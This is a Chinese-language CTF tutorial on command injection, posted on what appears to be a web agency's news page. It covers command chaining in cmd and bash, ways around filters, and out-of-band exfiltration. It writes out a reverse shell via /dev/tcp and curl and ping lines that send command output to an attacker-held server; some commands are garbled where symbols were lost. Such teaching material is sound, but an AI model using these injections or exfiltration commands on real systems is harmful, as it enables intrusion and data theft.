ARTICLE DETAIL

资讯详情

深耕网站视觉设计与运营推广的一线实战洞察。

命令注入漏洞

命令注入漏洞 命令注入漏洞命令注入开发者使用一些可以执行命令的函数且未对用户输入进行安全检查时造成命令注入。ctf中命令注入可以实现1.直接读取flag2.反弹shell3.利用题目环境灵动控制整个题目环境干扰其他队伍解题命令注入前需掌握bashcmd的基础语法1.转义字符windows cmd的转义字符为“^”,Linux bash的转义字符为“/”例2.多条命令执行注入最主要的手法在cmd中可以使用||%0a在bash中可以使用||$(),,%0a其中$()和 被双引号包裹仍可以执行命令但被单引号包裹就会被识别为普通字符串.3.注释符号可以避免在注入时由于多余参数造成的错误cmd中注释符号为或者rem只能在命令开始时使用bash中注释符号为#其前面必须要有一个空格命令注入时会遇到各种限制bash中a.禁止使用空格b.字符黑名单如果题目对catflag进行限制可以采用变量拼接的方法或者使用通配符“”表示单个字符“*”表示多个字符或者使用substr等函数截取字符串再拼接出所需命令3.数据外带执行的命令可能不会直接回现在网页中先尝试反弹shell在bash中使用“bash -i/dev/tcp/x.x.x.x/port 01”将bash的输入输出重定向到远程端口通过HTTP或DNS外带比如“curl http://server/whoami”或者“ping -nc 1whoami.sever.com”若目标机器无法连接外网可采用时间盲注若目标存在可写入的web文件那么可以采用复制需要的文件到web目录下然后通过HTTP进行访问的方法获取结果
返回列表